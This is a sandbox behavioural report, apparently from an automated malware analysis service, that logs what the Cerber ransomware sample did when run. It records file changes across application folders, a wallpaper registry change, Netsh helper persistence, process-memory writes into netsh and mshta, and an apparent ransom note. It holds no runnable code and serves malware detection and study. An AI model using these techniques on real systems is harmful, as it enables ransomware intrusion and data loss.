File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp2EBE.bmp" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 300 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 300 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 300 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 300 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2192 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
